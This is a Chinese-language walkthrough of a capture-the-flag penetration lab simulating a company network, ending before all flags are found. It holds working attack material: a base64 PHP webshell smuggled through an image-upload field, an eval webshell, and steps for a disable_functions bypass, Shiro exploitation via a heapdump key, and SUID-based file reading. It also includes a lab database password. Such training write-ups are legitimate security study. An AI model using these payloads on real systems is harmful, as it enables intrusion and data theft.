春秋云境-GreatWall综合渗透

“

在这个靶场中，您将扮演一名渗透测试工程师，接受雇佣任务来评估“SmartLink Technologies Ltd.”公司的网络安全状况。 您的任务是首先入侵该公司暴露在公网上的应用服务，然后运用后渗透技巧深入 SmartLink公司的内部网络。在这个过程中，您将寻找潜在的弱点和漏洞，并逐一接管所有服务，从而控制整个内部网络。靶场中共设置了6个Flag，它们分布在不同的靶机上，您需要找到并获取这些 Flag 作为您的成就目标。

前置知识

建议把以下知识点吃透再去打靶机，建立综合渗透思维

“

thinkphp5023

Heapdump内存分析、Shiro 反序列化

代码审计

frp代理、二层代理、proxifire全局流量代理

蚁剑绕过disable_functions

Kubernetes API server 未授权

Harbor 公开镜像仓库未授权访问 CVE-2022-46463（1.x <= Harbor <= 2.5.3）

MySQL UDF 提权

拓扑图

8.130.71.173-公网入口

使用fscan进行扫描

“

8.130.71.173:22 open

8.130.71.173:8080 open

8.130.71.173:80 open

WebTitle http://8.130.71.173       code:200 len:10887  title:""

WebTitle http://8.130.71.173:8080  code:200 len:1027   title:Login Form

PocScan http://8.130.71.173:8080 poc-yaml-thinkphp5023-method-rce poc1

发现8080端口存在thinkphp5023-method-rce漏洞，工具getshell一把梭

“

ifconfig

公网：8.130.71.173

内网：172.28.23.17

根目录拿到第一个flag

flag01: flag{176f49b6-147f-4557-99ec-ba0a351e1ada}

传fscan扫内网172.28.23.0/24网段

“

提取关键信息

[+] ftp 172.28.23.26:21:anonymous

[->]OASystem.zip

[+] PocScan http://172.28.23.33:8080 poc-yaml-spring-actuator-heapdump-file

[+] PocScan http://172.28.23.33:8080 poc-yaml-springboot-env-unauth spring2

内网一层代理

frp设置代理

“

公网vps

frps

[common] bind_port = 7000

“

webshell/8.130.71.173

frpc

[common] server_addr = 公网服务器地址 server_port = 7000

[socks5] type = tcp remote_port = 6000 plugin = socks5

proxifier全局流量代理

具体可见文章：关于内网代理、vm、frp、proxifier全局流量转发等问题

172.28.23.26-新翔0A

“

[+] ftp 172.28.23.26:21:anonymous

[->]OASystem.zip

ftp匿名登录，到本地

进行代码审计，很明显的文件上传

引入db.php和checklogin.php文件

check.php，设置cookie：id=1;loginname=1;jueseid=1;danweiid=1;quanxian=1，就能登录main.php，下面的upload可以不用登录进行上传，导致这个代码审计结果用处不大

check.php

<?phpfunctionislogin(){if(isset($_COOKIE['id'])&&isset($_COOKIE['loginname'])&&isset($_COOKIE['jueseid'])&&isset($_COOKIE['danweiid'])&&isset($_COOKIE['quanxian'])){if($_COOKIE['id']!=''&&$_COOKIE['loginname']!=''&&$_COOKIE['jueseid']!=''&&$_COOKIE['danweiid']!=''&&$_COOKIE['quanxian']!=''){returntrue;    }else {returnfalse;    }    }else {returnfalse;     }}?>

uploadbase64.php

<?php/** * Description: PhpStorm. * Author: yoby * DateTime: 2018/12/4 18:01 * Email:logove@qq.com * Copyright Yoby版权所有 */$img = $_POST['imgbase64'];if (preg_match('/^(data:s*image/(w+);base64,)/', $img, $result)) {    $type = ".".$result[2];    $path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;}$img =  base64_decode(str_replace($result[1], '', $img));@file_put_contents($path, $img);exit('{"src":"'.$path.'"}');

格式为data:image;base64,xxx，就能够上传(post)

imgbase64=data:image/php;base64,PD89YCRfR0VUWzFdYDtldmFsKCRfUE9TVFsxXSk7Pz4=

上webshell，回显ret=127，使用蚁剑的disable_functions插件绕过

自动新建/var/www/html/OAsystem/upload/.antproxy.php和/tmp/.90482ant_x64.so文件

上传1.php的get型马，让.antproxy.php指向1.php，使能get利用

<?phpeval($_GET[1]);?>

.antproxy.php的37行修改为1.php的路径

“

ifconfig

172.28.23.26

172.22.14.6

get方式传，看到flag02.txt，不能直接cat读取

find / -perm -u=s -type f 2>/dev/null，看suid权限

可以利用base32，解码flag->

flag02: flag{56d37734-5f73-447f-b1a5-a83f45549b28}

172.28.23.33-ERP后台

“

[+] PocScan http://172.28.23.33:8080 poc-yaml-spring-actuator-heapdump-file

访问/actuator/heapdump路径得到heapdump文件

java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump解密，找到key的值

“

algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES

aes加密，内定key，猜测是shiro框架，工具一把梭

在/home/ops01/目录发现HashNote文件，以及在基础信息搜集阶段发现59696监听端口，pwn题目

172.28.23.33:59696

对pwn还没学，这题先放这吧

flag03

172.22.14.0/24

传fscan，扫内网，浏览器界面不方便操作，蚁剑换成PHP7_Backtrace_UAF绕过，这个模式可以用命令行，但不稳定

fscan对于172.22.14.0/24网段信息收集

这里少了k8s的机器，可能是环境出问题了，等有沙砾了再重新打一次

内网二层代理

“

8.130.71.173-公网入口

frps

[common] bind_port = 7000

“

172.28.23.26

frpc

[common] server_addr =172.28.23.17 server_port = 7000

[socks5] type = tcp remote_port = 6000 plugin = socks5

172.22.14.37-k8s API未授权

靶机未拉起

flag04

172.22.14.46-harbor

公开信息泄露漏洞去打

在413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49包下找到flag

flag05: flag{8c89ccd3-029d-41c8-8b47-98fb2006f0cf}

继续分析run.sh，兔子洞

分析其他镜像找线索，project/projectadmin镜像下找到另一份带有ProjectAdmin-0.0.1-SNAPSHOT.jar包的文件

反编译，找到了数据库密码

“

172.22.10.28

spring.datasource.username=root spring.datasource.password=My3q1i4oZkJm3

navicate都能连接，工具梭哈连接不到，真是奇怪

没时间了，等沙砾赞够了再继续打吧

flag06